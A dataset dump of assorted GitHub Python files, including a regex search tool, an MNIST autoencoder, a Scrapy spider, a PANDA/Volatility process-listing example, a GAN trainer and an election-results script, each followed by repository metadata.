matcher_factory(args):\n if args.underline:\n match = UnderLineMatcher()\n elif args.color:\n match = ColorMatcher()\n elif args.machine:\n match = MachineMatcher()\n else:\n match = DefaultMatcher()\n return match\n\n\ndef main(args):\n match = matcher_factory(args)\n if args.files:\n for file in args.files:\n match.print_result(file.name, file, args.regex)\n else:\n STDIN = input(\"Please add the content to search:\\n\")\n match.print_result('STDIN', STDIN.split('\\n'), args.regex)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(man_page)\n mandatory = parser.add_argument_group(\"mandatory arguments\")\n mandatory.add_argument(\"-r\", \"--regex\", required=True, help=\"the regular expression to search for.\")\n\n parser.add_argument(\"-f\", \"--files\", nargs='+', type=argparse.FileType('r'),\n help=\"a list of files to search in.\")\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\"-u\", \"--underline\", action=\"store_true\",\n help=\"'^' is printed underneath the matched text\")\n group.add_argument(\"-c\", \"--color\", action=\"store_true\",\n help=\"the matched text is highlighted in color [1].\")\n group.add_argument(\"-m\", \"--machine\", action=\"store_true\",\n help=\"print the output in the format: 'file_name:line_number:start_position:matched_text'.\")\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"mishab00/SearchHelper","sub_path":"SearchHelper.py","file_name":"SearchHelper.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"44395715083","text":"import torch\nimport numpy as np\nfrom book.pytorch.utils.helper import get_mnist_loader\nimport torch.nn.functional as F\nfrom torch import nn\nimport matplotlib.pyplot as plt\n\n\nclass AutoEncoder(nn.Module):\n def __init__(self, encoding_dim):\n super(AutoEncoder, self).__init__()\n # encoder - linear layer (784 -> encoding_dim)\n self.fc1 = nn.Linear(28 * 28, encoding_dim)\n\n # decoder - linear layer (encoding_dim -> input size)\n self.fc2 = nn.Linear(encoding_dim, 28 * 28)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = torch.sigmoid(self.fc2(x)) # (sigmoid for scaling from 0 to 1)\n return x\n\n\nif __name__ == '__main__':\n \"\"\"\n the compressed representation often holds key information about an input image and we can use it for \n denoising images or oher kinds of reconstruction and transformation!\n \"\"\"\n batch_size = 20\n train_loader, test_loader, valid_loader = get_mnist_loader(batch_size=batch_size, is_norm=False)\n\n model = AutoEncoder(encoding_dim=32)\n print(model)\n\n \"\"\"comparing pixel values in input and output images, it's best to use a loss that meant for a regression task\"\"\"\n criterion = nn.MSELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n\n n_epochs = 20\n for epoch in range(1, n_epochs + 1):\n train_loss = 0.0\n for data in train_loader:\n images, _ = data\n images = images.view(images.size(0), -1) # flatten images\n optimizer.zero_grad()\n outputs = model(images)\n loss = criterion(outputs, images)\n loss.backward()\n optimizer.step()\n train_loss += loss.item() * images.size(0)\n\n # print avg training statistics\n train_loss = train_loss / len(train_loader)\n print('Epoch: {} \\tTraining Loss: {:.6f}'.format(epoch, train_loss))\n\n # check test\n dataiter = iter(test_loader)\n images, labels = dataiter.next()\n\n images_flatten = images.view(images.size(0), -1)\n output = model(images_flatten)\n images = images.numpy()\n\n # output is resized into a batch of images\n output = output.view(batch_size, 1, 28, 28)\n # use detach when it's an output that requires_grad\n output = output.detach().numpy()\n\n # plot the first ten input images and then reconstructed images\n fig, axes = plt.subplots(nrows=2, ncols=10, sharex=True, sharey=True, figsize=(25, 4))\n\n # input images on top row, reconstructions on bottom\n for images, row in zip([images, output], axes):\n for img, ax in zip(images, row):\n ax.imshow(np.squeeze(img), cmap='gray')\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n plt.show()\n","repo_name":"jk983294/morph","sub_path":"book/pytorch/autoencoder/linear.py","file_name":"linear.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"25106887319","text":"\nimport numpy as np\nfrom numpy import sin, exp\nfrom tqdm import tqdm\n\n\n\n\n\nclass Integrate:\n def __init__(self, function):\n self.function = function\n self.error = 0\n self.sign = 1\n\n def double_integral(self, limit_list, precision=500):\n if type(limit_list) != list:\n raise IntegrationError(\"The bounds must be given as a list of lists\")\n x_list, y_list = limit_list\n (a, b), (c, d) = x_list, y_list\n x_points, y_points = (b - a) * precision, (d - c) * precision\n xs, ys = np.linspace(a, b, int(x_points)), np.linspace(c, d, int(y_points))\n integral = 0\n sub_sum = 0\n super_sum = 0\n for i in tqdm(range(len(xs) - 1)):\n delta_x = xs[i + 1] - xs[i]\n for j in range(len(ys) - 1):\n delta_y = ys[j + 1] - ys[j]\n delta = delta_x * delta_y\n try:\n f1 = self.function(xs[i], ys[j])\n sub_area = f1 * delta\n f2 = self.function(xs[i + 1], ys[j + 1])\n super_area = f2 * delta\n\n area = (f2 + f1) / 2 * delta\n integral += area\n sub_sum += sub_area\n super_sum += super_area\n except ZeroDivisionError:\n print(f\"\\nAvoided pole\\n\")\n\n self.error = super_sum - sub_sum\n return integral\n\n\n def integral(self, lower, upper, precision=10000):\n if lower > upper:\n lower, upper = upper, lower\n self.sign = -1\n number_of_points = (upper - lower) * precision\n xs = np.linspace(lower, upper, int(number_of_points))\n integral = 0\n super_sum = 0\n sub_sum = 0\n for index in tqdm(range(len(xs) - 1)):\n delta = xs[index + 1] - xs[index]\n try:\n y1 = self.function(xs[index])\n sub_area = y1 * delta\n y2 = self.function(xs[index + 1])\n super_area = y2 * delta\n\n area = (y2 + y1) / 2 * delta\n integral += area\n sub_sum += sub_area\n super_sum += super_area\n except ZeroDivisionError:\n print(f\"\\nAvoided pole\")\n\n self.error = super_sum - sub_sum\n return self.sign * integral\n\n\ndef simple_test(x):\n return sin(x) / x\n\nresult = Integrate(simple_test).integral(-1, 1)\nprint(result)\n\n\nclass IntegrationError(Exception):\n def __init__(self, *args):\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self):\n if self.message:\n return self.message\n return \"Custom Error\"\n\n\n\n\n\n\n\n\ndef double_gaussian(x, y):\n return exp(-(x ** 2 + y ** 2))\n\n\n# Build an Integrate object\nintegral = Integrate(double_gaussian)\n\n# Calculate the integral\nresult = integral.double_integral([[-500, 500], [-500, 500]], precision=3 )\n\n# Show the result and the accuracy\nprint(\"The result is\", result)\n\n# Calculate the error range\nprint(\"\\nThe accuracy of this result is\", integral.error)","repo_name":"RashmitShrestha/mlModels","sub_path":"math.py","file_name":"math.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"31018022342","text":"import scrapy\n\nclass Spider(scrapy.Spider):\n name = \"article_spider\"\n\n\n start_urls = ['https://www.thehindu.com/archive/web/2009/08/15/']\n\n def parse(self, response):\n all_divs = response.css('.tpaper-container')\n all_sections = all_divs.css(\"section\")\n topics = ['bengaluru', 'chennai', 'international', 'thiruvananthapuram', 'vijayawada', 'visakhapatnam',\n 'national', 'andhra pradesh',\n 'karnataka', 'kerala', 'tamil nadu', 'other states', 'coimbatore', 'delhi', 'hyderabad']\n\n for sect in all_sections:\n temp = sect.css(\"h2::attr(id)\").extract_first()\n if temp in topics:\n arc_list = sect.css(\".archive-list\")\n all_headlines = arc_list.css(\"li\")\n for hd in all_headlines:\n child_links = hd.css('a::attr(href)')\n for clk in child_links:\n url = clk.get()\n ret_dict = {'Headline': hd.css('a::text').get()}\n req = scrapy.Request(url, callback=self.parse2, dont_filter=True)\n req.meta['item'] = ret_dict\n yield req\n\n def parse2(self, response2):\n ret_dict = response2.meta['item']\n date = response2.css('span[class=\"blue-color ksl-time-stamp\"]')\n date = date.css('none::text').get()\n txt = response2.css('.article')\n cont = txt.css('div::attr(id)').get()\n txt = txt.css('div[id='+cont+']')\n content = \"\"\n txt = txt.css('p::text')\n for t in txt:\n content = content + \" \" + t.get()\n ret_dict['Date'] = date.replace('\\n','')\n ret_dict['Text'] = content\n yield ret_dict\n","repo_name":"kushagragarwal2443/Web_Scraping_ISB","sub_path":"Scrapy/TOI/TOI/spiders/hindu.py","file_name":"hindu.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"27987323020","text":"import mimetypes\nimport re\n\nfrom pathlib import Path\n\nexec(open(\"./utils.py\").read())\nexec(open(\"./depop.py\").read())\n\n# TODO: separate files by name???\n# some sample sets contain multiple styles\n\n# TODO: remove non-musical audio files???\n# these might just be the ones with no note info...\n\ndef find_dynamic(path):\n # replace _ with - because _ is included in \\w\n cleaned_path = path.replace(\"_\",\" \")\n # tries to find dynamics and *not* notes\n # TODO: this struggles if dynamic is at the end\n match = re.search(r\"(\\b|\\W)(m?(f+|p+))[^#0-9](\\b|\\W)\", cleaned_path, flags=re.IGNORECASE)\n if match is None:\n return\n else:\n return match.group(2)\n\ndef is_audio(path):\n try:\n if \"audio\" in mimetypes.guess_type(path)[0]:\n return True\n else:\n return False\n except TypeError:\n # path is not a file\n return False\n\ndef convert(file, destination, dynamics_dict):\n # get the filename only\n filename = os.path.basename(file)\n # remove the extension\n filename = os.path.splitext(filename)[0]\n\n # get the note\n # NB: if this doesn't work well, there are fancier options like\n # https://github.com/mzucker/python-tuner/blob/master/tuner.py\n match = re.search(r\"[a-g]{1}[#b]?[0-9]{1}\", filename, flags=re.IGNORECASE)\n if match is None:\n # TODO: no note in filename\n # maybe these can be discarded in most cases?\n pass\n midival = str2midi(match.group(0))\n\n # TODO: velocity instead of dynamics?\n dynamic = find_dynamic(filename)\n if not dynamic:\n dynamics = 1\n dynamic = 1\n else:\n dynamics = len(dynamics_dict)\n dynamic = dynamics_dict[dynamic]\n\n release = 0\n seconds = 12\n\n # format filename, incrementing for variations\n variation = 1\n new_name = \"{}.{}.{}.{}.{}.wav\".format(midival,dynamic,dynamics,variation,release)\n output = destination + '/' + new_name\n while os.path.isfile(output):\n variation += 1\n new_name = \"{}.{}.{}.{}.{}.wav\".format(midival,dynamic,dynamics,variation,release)\n output = destination + '/' + new_name\n\n cmd = ['ffmpeg','-i',file,'-ac','2','-af','silenceremove=1:0:-60dB','-y',output]\n run(cmd)\n\n#######################################\n# Start here\n#######################################\n\nfolder = os.path.abspath(sys.argv[1])\n# TODO: allow setting output path\ndestination = sys.argv[2]\n\n# filter folder to just audio files (in any subfolder)\naudio_files = [x for x in list(Path(folder).rglob('*')) if is_audio(x)]\n\n# find the dynamics in the filenames\n# number of dynamics: len(dynamics)\ndynamics = set([find_dynamic(x.name) for x in audio_files])\n\ndynamics_dict = {}\nif len(dynamics) > 1:\n # create dynamics translation layer for this sample set\n translation_layer = {\n \"ppp\": 1,\n \"pp\": 2,\n \"p\": 3,\n \"mp\": 4,\n \"mf\": 5,\n \"f\": 6,\n \"ff\": 7,\n \"fff\": 8\n }\n\n # just keep the ones used by this sample set\n for d in dynamics:\n dynamics_dict[d] = translation_layer[d.lower()]\n\n # sort by value, going from ppp to fff\n t2 = dict(sorted(dynamics_dict.items(), key=lambda item: item[1]))\n\n # reassign dynamic values to the remaining dynamics\n # TODO: this is where velocity values could be assigned\n dynamic = 1\n for d in t2:\n dynamics_dict[d] = dynamic\n dynamic += 1\n\n# make sure destination exists\nif not os.path.exists(destination):\n os.makedirs(destination)\n\n# do the conversion\nfor file in tqdm(audio_files):\n convert(file, destination, dynamics_dict)\n","repo_name":"schollz/mx.samples","sub_path":"samples/convert_samples.py","file_name":"convert_samples.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"36"} +{"seq_id":"11887621910","text":"import csv\n\nimport matplotlib.animation as animation\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.integrate as integrate\nfrom scipy.spatial.distance import pdist, squareform\n\n\nclass Universe:\n def __init__(self):\n self.iter_cnt = 0\n self.iter_max = 0\n self.time_per_iter = 0.\n self.time_elapsed = 0.\n self.size = 0\n self.mass = []\n self.state = []\n\n # load init data\n with open('./data/init.csv', 'r') as init_f:\n reader = csv.reader(init_f)\n # data = list(reader)\n for i, row in enumerate(reader):\n if i == 0: # meta info\n self.size = int(row[0])\n self.time_per_iter = float(row[1])\n self.iter_max = int(row[2])\n continue\n self.mass.append(float(row[0]))\n self.state.append([float(i) for i in row[1:]])\n self.mass = np.asarray(self.mass)\n self.state = np.asarray(self.state)\n\n def step(self, dt):\n self.time_elapsed += dt\n # if it's time to fetch next iteration\n if self.time_elapsed >= self.time_per_iter:\n self.time_elapsed = 0.\n if self.iter_cnt < self.iter_max:\n with open('./data/' + str(self.iter_cnt) + '.csv', 'r') as f:\n reader = csv.reader(f)\n for i, row in enumerate(reader):\n for j, val in enumerate(row):\n self.state[i][j] = float(val)\n self.iter_cnt += 1\n else:\n print(\"Simulation finished!\")\n exit(0)\n else:\n self.state[:, :2] += dt * self.state[:, 2:]\n\n\nuni = Universe()\ndt = 1 / (uni.time_per_iter * 30) # this controls the speed\n\n# set up figure and animation\nfig = plt.figure()\nfig.subplots_adjust(left=0, right=1, bottom=0, top=1)\nax = fig.add_subplot(111, aspect='equal', autoscale_on=False,\n xlim=(-uni.size, uni.size), ylim=(-uni.size, uni.size))\n\n# planets holds the locations of the planets\nplanets, = ax.plot([], [], 'bo', ms=600)\n\n# rect is the universe edge\nrect = plt.Rectangle([-uni.size, -uni.size], 2 * uni.size, 2 *\n uni.size, ec='none', lw=2, fc='none')\nax.add_patch(rect)\n\n\ndef init():\n \"\"\"init animation\"\"\"\n global uni, rect\n planets.set_data([], [])\n rect.set_edgecolor('none')\n return planets, rect\n\n\ndef animate(i):\n \"\"\"perform animation step\"\"\"\n global uni, rect, dt, ax, fig\n uni.step(dt)\n\n ms = int(fig.dpi * 2 * (uni.size / 160) * fig.get_figwidth() /\n np.diff(ax.get_xbound())[0])\n\n # update pieces of the animation\n rect.set_edgecolor('k')\n # print(uni.state)\n planets.set_data(uni.state[:, 0], uni.state[:, 1])\n planets.set_markersize(ms)\n return planets, rect\n\n\nani = animation.FuncAnimation(\n fig, animate, frames=600, interval=10, blit=True, init_func=init)\n\nplt.show()\n","repo_name":"huyang531/BUPT-Course-Work","sub_path":"Parallel Computing/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"22869487796","text":"# When paused at a yield statement generator objects\n# can receive data by using .send() instead of .next().\n\n# When we use yield as an expression or assign it to a variable,\n# the value passed to .send() is available inside the generator.\n\n\ndef knock_knock():\n name = yield \"Who's there?\"\n yield \"%s who?\" % name\n yield \"That's not funny at all\"\n\n# We have to switch to manually calling .next() on our generator object,\n# because a for loop or function that takes an iterable\n# won't be able to call .send() when we need to.\n\nk = knock_knock()\nnext(k)\n# >>> \"Who's there?\"\n\n# At this point execution is paused at the first yield.\n# The assignment to the variable name hasn't happened yet.\n# But when we .send() a value execution continues:\n\nk.send(\"David\")\n# >>>'David who?'\n\n# In generator object we are at the second yield with \"David\" assigned to name.\n\n# If we send something to a yield that isn't being used as an expression,\n# the value we send will be ignored:\n\nk.send(\"David the environmentalist\")\n# >>>\"That's not funny at all\"\n\n# But execution continues the same as if we called .next()\n","repo_name":"DerevenetsArtyom/pure-python","sub_path":"generators/first_coroutine.py","file_name":"first_coroutine.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"38826344528","text":"from soul_link.wrappers.steam import get_app_details, get_app_id_from_store_url\n\n\ndef collect_steam_game_data(url: str) -> dict:\n \"\"\"\n Get Steam game store details.\n\n Args:\n url (str): URL where the Steam application ID will be gathered to collect game data.\n\n Returns:\n dict: the dictionary has the following keys:\n - name (str): Game name.\n - is_free (bool): `true` if the game is free, `false` otherwise.\n - short_description (str): Steam game short description.\n - categories (list[str]): list of game categories like `Single-Player`.\n - genres (list[str]): list of game genres like 'Strategy'.\n - release (bool): `true` if the game has been releashed, `false` otherwise.\n\n Raises:\n wrappers.steam.SteamInvalidStoreURL: Raised if the given `url` is not a valid Steam store URL.\n wrappers.steam.SteamInvalidAppID: Raised if the given `app_id` is not a valida number or equal or less than 0.\n requests.exceptions.ConnectionError: If the connection to steam can not be stablished.\n \"\"\"\n if not url.startswith(\"https://store.steampowered.com\"):\n print(\"Currently we only support Steam store URLs\")\n\n app_id = str(get_app_id_from_store_url(url))\n app_details = get_app_details(app_id)\n\n if app_id not in app_details or not app_details[app_id][\"success\"]:\n print(\"Game does not exist\")\n return\n\n app_details = app_details[app_id]\n return_details = {}\n return_details[\"name\"] = app_details[\"data\"][\"name\"]\n return_details[\"is_free\"] = app_details[\"data\"][\"is_free\"]\n return_details[\"short_description\"] = app_details[\"data\"][\"short_description\"]\n\n return_details[\"categories\"] = []\n for category in app_details[\"data\"][\"categories\"]:\n return_details[\"categories\"].append(category[\"description\"])\n\n return_details[\"genres\"] = []\n for genre in app_details[\"data\"][\"genres\"]:\n return_details[\"genres\"].append(genre[\"description\"])\n\n return_details[\"released\"] = False\n if (\n \"comin_soon\" not in app_details[\"data\"][\"release_date\"]\n and not app_details[\"data\"][\"release_date\"][\"coming_soon\"]\n ):\n return_details[\"released\"] = True\n return return_details\n","repo_name":"dloez/soul-link","sub_path":"soul_link/collect_game_data.py","file_name":"collect_game_data.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40705712504","text":"import itertools\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\n\nn = int(input())\na = [[0]*n for _ in range(n)] \nfor i in range(n):\n a[i] = list(map(int, input().split()))\n\nm = int(input())\nxy = [tuple(map(int,input().split())) for _ in range(m)]\ndislike_list = [[] for _ in range(n)]\nfor i, (x,y) in enumerate(xy):\n x, y = x - 1, y - 1\n dislike_list[x].append(y)\n dislike_list[y].append(x)\n\nans = float(\"inf\")\nfor order in itertools.permutations(list(range(n))):\n tmp = 0\n pre_runner = order[0]\n for leg, runner in enumerate(order):\n tmp += a[runner][leg]\n if runner in dislike_list[pre_runner]:\n break\n pre_runner = runner\n else:\n ans = min(ans, tmp)\n\nif ans == float(\"inf\"):\n ans = -1\n\nprint(ans)","repo_name":"hasesuns/atcoder","sub_path":"submitted/typical90/032.py","file_name":"032.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22804714695","text":"'''\nvolatility pslist two ways.\nBy: Luke Craig\n'''\n\nfrom pandare import Panda, blocking\nfrom sys import argv\nfrom time import time\nfrom volatility.framework.objects import utility\n\narch = \"x86_64\" if len(argv) <= 1 else argv[1]\nextra = \"-nographic -chardev socket,id=monitor,path=./monitor.sock,server,nowait -monitor chardev:monitor -serial telnet:127.0.0.1:4444,server,nowait\"\nqcow = \"/home/luke/workspace/qcows/instance-1.qcow2\"\npanda = Panda(arch=arch,qcow=qcow,extra_args=extra,mem=\"1G\")\n\ntimechange = 5\noldtime,oldtime2 = time(),time()\n\n'''\nIn on_asid_change we use the fast method. It gives us back the volatility symbols\nand we \"become\" the volatility plugin. The reason this is fast is because we clear\nthe cache between runs so we don't have to reconstruct the whole plugin again. This\nway we only have to run the 10+ second startup once.\n'''\n@panda.cb_asid_changed()\ndef on_asid_change(env, old_asid, new_asid):\n\tglobal oldtime\n\tif time() - oldtime > timechange:\n\t\tvmlinux = panda.get_volatility_symbols(debug=True)\n\t\tinit_task = vmlinux.object_from_symbol(symbol_name = \"init_task\")\n\t\tout = [(task.pid,task.parent.pid,utility.array_to_string(task.comm)) for task in init_task.tasks if task.pid]\n\t\tprint(\"PID\\tPPID\\tProcess Name\")\n\t\tfor task in out:\n\t\t\tprint(\"{}\\t{}\\t{}\".format(task[0],task[1],task[2]))\n\t\tprint(\"Number of tasks: \"+len(out))\n\t\toldtime = time()\n\treturn 0\n\n'''\nIn on_asid_change_slow we have an example where volatility will be run with the name\n(and arguments) desired and a dictionary of results will be be returned. This must\nre-construct the plugin and re-scan memory every time. It is quite slow.\n'''\n@panda.cb_asid_changed()\ndef on_asid_change_slow(env, old_asid, new_asid):\n\tglobal oldtime2\n\tif time() - oldtime > timechange:\n\t\ta = time()\n\t\tprint(panda.run_volatility(\"linux.pslist.PsList\"))\n\t\tran_in = time() - a\n\t\tprint(\"ran in \"+str(ran_in) + \" seconds\")\n\t\toldtime = time()\n\treturn 0\n\npanda.run()\n","repo_name":"panda-re/panda","sub_path":"panda/python/examples/experimental/volatility/vol_pslist.py","file_name":"vol_pslist.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":2347,"dataset":"github-code","pt":"19"} +{"seq_id":"11895368749","text":"import os\nimport csv\nimport argparse\nimport tensorflow as tf\nfrom tf import GradientTape\nfrom tf.keras.optimizers import Adam\nfrom tf.keras.losses import BinaryCrossentropy\nfrom tf.keras.utils import normalize\nfrom tf.image import (rgb_to_grayscale, resize)\n\n\nclass TrainGAN():\n\n def __init__(self, args):\n # import classes\n sys.path.append(\"..\")\n from preprocessing.process_vids import ProcessVids\n from models.generator import Generator\n from models.realism_discriminator import RealismDiscriminator\n from models.feature_pose import FeaturePose\n # initialize training variables\n self.numEpochs = args.numEpochs\n\n self.genOptimizer = Adam(args.lr)\n self.realismOptimizer = Adam(args.lr)\n\n self.genLoss = self.realismLoss = None\n\n self.crossEntropy = BinaryCrossentropy(from_logits=True)\n\n # initialize preprocessor and build/load data\n preprocessor = ProcessVids(args.rawDir, args.proDir,\n args.batchSize, args.valSize,\n args.threadNum, args.preFetch)\n self.trainData, self.valData = preprocessor.loadData()\n\n # initialize models\n self.generator = Generator()\n self.realism = RealismDiscriminator()\n self.featurePose = FeaturePose()\n\n # initialize checkpoints and managers\n if not args.restore:\n for f in os.listdir('data/checkpoints/generator'):\n os.remove('data/checkpoints/generator/' + f)\n for f in os.listdir('data/checkpoints/realism_discriminator'):\n os.remove('data/checkpoints/realism_discriminator/' + f)\n for f in os.listdir('data/checkpoints/feature_pose'):\n os.remove('data/checkpoints/feature_pose/' + f)\n\n self.checkpointG = tf.train.Checkpoint(optimizer=self.genOptimizer,\n model=self.generator)\n self.managerG = tf.train.CheckpointManager(self.checkpointG,\n directory='data/checkpoints/generator',\n max_to_keep=5, keep_checkpoint_every_n_hours=2)\n\n self.checkpointR = tf.train.Checkpoint(optimizer=self.realismOptimizer,\n model=self.realism)\n self.managerR = tf.train.CheckpointManager(self.checkpointR,\n directory='data/checkpoints/realism_discriminator',\n max_to_keep=5, keep_checkpoint_every_n_hours=2)\n\n if os.path.isfile('/data/checkpoints/gan_losses.csv'):\n os.remove('/data/checkpoints/gan_losses.csv')\n\n def _generatorLoss(self, x):\n return self.crossEntropy(tf.ones_like(x), x)\n\n def _realismLoss(self, realOut, fakeOut):\n realLoss = self.crossEntropy(tf.ones_like(realOut), realOut)\n fakeOut = self.crossEntropy(tf.zeros_like(fakeOut), fakeOut)\n return realLoss + fakeLoss\n\n def _compareFeatures(self, x, y):\n x = normalize(x)\n y = normalize(y)\n diff = tf.math.subtract(x, y)\n diff = tf.math.abs(diff)\n diff = tf.math.reduce_mean(diff)\n return self.crossEntropy(tf.zeros_like(diff), diff)\n\n def _logTrain(self, epoch):\n msg = 'Training Epoch {}, Generator Loss: {}, Discriminator Loss: {}'\n print(msg.format(epoch + 1, self.genLoss, self.realismLoss), end='\\r')\n\n def _logVal(self, epoch):\n msg = 'Validating Epoch {}, Generator Loss: {}, Discriminator Loss: {}'\n print(msg.format(epoch + 1, self.genLoss, self.realismLoss), end='\\r')\n\n def _save(self):\n self.managerG.save()\n self.managerR.save()\n with open('data/checkpoints/gan_losses.csv', 'a', newline='') as file:\n writer = csv.writer(file)\n writer.writerow([self.genLoss, self.realismLoss])\n\n def _greyscale(self, image):\n image = resize(image, (96, 96))\n image = rgb_to_grayscale(image)\n return image\n\n @tf.function\n def _validate(self, inputA, inputB):\n generated = self.generator.call(inputA, inputB, training=True)\n\n realismReal = self.realism.call(input, training=True)\n realismFake = self.realism.call(generated, training=True)\n\n genLossR = self._generatorLoss(realismFake)\n\n self.realismLoss = self._realismLoss(realismReal, realismFake)\n\n featuresSource = self.featurePose.call(inputB)\n featuresGen = self.featurePose.call(generated)\n\n featuresfeaturePose = _compareFeatures(featuresSource, featuresGen)\n\n genLossS = self._generatorLoss(featuresfeaturePose)\n\n self.genLoss = (genLossR + genLossS) / 2\n\n @tf.function\n def _update(self, inputA, inputB):\n with GradientTape() as genTape, GradientTape() as realismTape:\n generated = self.generator.call(inputA, inputB, training=True)\n\n realismReal = self.realism.call(inputA, training=True)\n realismFake = self.realism.call(generated, training=True)\n\n genLossR = self._generatorLoss(realismFake)\n\n self.realismLoss = self._realismLoss(realismReal, realismFake)\n\n featuresSource = self.featurePose.call(self._greyscale(inputB))\n featuresGen = self.featurePose.call(self._greyscale(generated))\n\n featurePose = _compareFeatures(featuresSource, featuresGen)\n\n genLossS = self._generatorLoss(featurePose)\n\n self.genLoss = (genLossR + genLossS) / 2\n\n genGradients = genTape.gradient(self.genLoss, self.generator.trainable_variables)\n realismGradients = realismTape.gradient(\n self.realismLoss, self.realism.trainable_variables)\n\n self.genOptimizer.apply_gradients(zip(genGradients, self.generator.trainable_variables))\n self.realismOptimizer.apply_gradients(\n zip(realismGradients, self.realism.trainable_variables))\n\n def train(self):\n self.checkpointG.restore(self.managerG.latest_checkpoint)\n self.checkpointR.restore(self.managerR.latest_checkpoint)\n\n for epoch in range(self.numEpochs):\n for input, output in self.trainData:\n self._update(input, output)\n self._logTrain(epoch)\n print('')\n for input, output in self.valData:\n self._validate(input, output)\n self._logVal(epoch)\n\n print('Epoch {} complete'.format(epoch + 1))\n self.trainData = self.trainData.shuffle(args.threadNum)\n self.valData = self.valData.shuffle(args.threadNum)\n\n self._save()\n\n\nif __name__ == '__main__':\n def str2bool(v):\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--numEpochs', default=100, type=int)\n parser.add_argument('--lr', default=1e-4, type=float)\n parser.add_argument('--rawDir', default='data/raw/faces', type=str)\n parser.add_argument('--proDir', default='data/processed/faces', type=str)\n parser.add_argument('--batchSize', default=32, type=int)\n parser.add_argument('--preFetch', default=1, type=int)\n parser.add_argument('--valSize', default=1000, type=int)\n parser.add_argument('--threadNum', default=4, type=int)\n parser.add_argument('--restore', default=True, type=str2bool)\n args = parser.parse_args()\n\n train = TrainGAN(args)\n train.train()\n","repo_name":"aaronlockhartdev/deepfakeGAN","sub_path":"actuation/train_gan.py","file_name":"train_gan.py","file_ext":"py","file_size_in_byte":7535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"10236967437","text":"\"\"\"client status parse config\"\"\"\n\n# -*- coding:utf-8 -*-\n\n\nclass StatusParseConfig:\n \"\"\"状态数据解析器配置\\n\n datamatcher:数据匹配器\"\"\"\n\n def __init__(self, exts: dict):\n if not isinstance(exts, dict) or len(exts) < 1:\n raise Exception(\"Invalid param 'exts' for StatusParseConfig\")\n self._exts: dict = {}\n for i in exts.items():\n e = i[0]\n t = i[1]\n if not isinstance(e, str) or e == \"\":\n continue\n if not isinstance(t, type):\n continue\n e = e.strip().lstrip('.')\n if not self._exts.__contains__(e):\n self._exts[e] = t\n","repo_name":"Octoberr/sspywork","sub_path":"savecode/threeyears/idownserver/statusmantainer/statusparseconfig.py","file_name":"statusparseconfig.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"23131700405","text":"#!/usr/bin/env python\n# Modules\nimport os, sys\nfrom wsgiref.simple_server import sys_version\nimport requests\nimport csv\n\n__author__ = \"Audrey Monjaras\"\n__credits__ = \"Audrey Monjaras\"\n__version__ = \"1.0.0\"\n__status__ = \"Development\"\n\n# Assign a variable for the file to load and the path\ncsvpath = os.path.join(\"Resources\", \"election_results.csv\")\n\n# Assign a variable to save the file to a path\ntxtcreate = os.path.join(\"analysis\", \"election_analysis_practice.txt\")\n\n# Initialize a total vote counter\ntotal_votes = 0\n\n# Candidate Options and Candidate Votes\ncandidate_options = []\ncandidate_votes = {}\n\n# Winning Candidate and Winning Count Tracker\nwinning_candidate = \"\"\nwinning_count = 0\nwinning_percentage = 0\n\n# Open the election results and read the file\nwith open(csvpath) as election_data:\n\n # Read the file object with the reader function\n csvreader = csv.reader(election_data)\n\n # Read the header row\n headers = next(csvreader)\n \n # Print each row in the CSV file\n for row in csvreader:\n # Add to the total vote count.\n total_votes += 1\n # Get the candidate name for each row\n candidate_name = row[2]\n \n # Add the candidate name to the candidate list\n if candidate_name not in candidate_options:\n # Add it to the list of candidates\n candidate_options.append(candidate_name)\n # Begin tracking that candidate's vote count\n candidate_votes[candidate_name] = 0\n # Add votes to each candidate\n candidate_votes[candidate_name] += 1\n\n# Saving the results to a text file\nwith open(txtcreate, \"w\") as txt_file:\n\n # Print final count to terminal\n election_results = (\n f\"\\nElection Results\\n\"\n f\"----------------------\\n\"\n f\"Total Votes: {total_votes:,}\\n\"\n f\"-----------------------\\n\" )\n print(election_results, end=\"\")\n\n # Save the final vote count to the text file\n txt_file.write(election_results)\n\n # Percentage of votes for each candidate by looping though the counts\n # Iterate thorugh the candidate list\n for candidate_name in candidate_votes:\n # Retreive vote count of candidate\n votes = candidate_votes[candidate_name]\n # Calculate the percentage of votes\n vote_percentage = float(votes) / float(total_votes) * 100\n # Print the 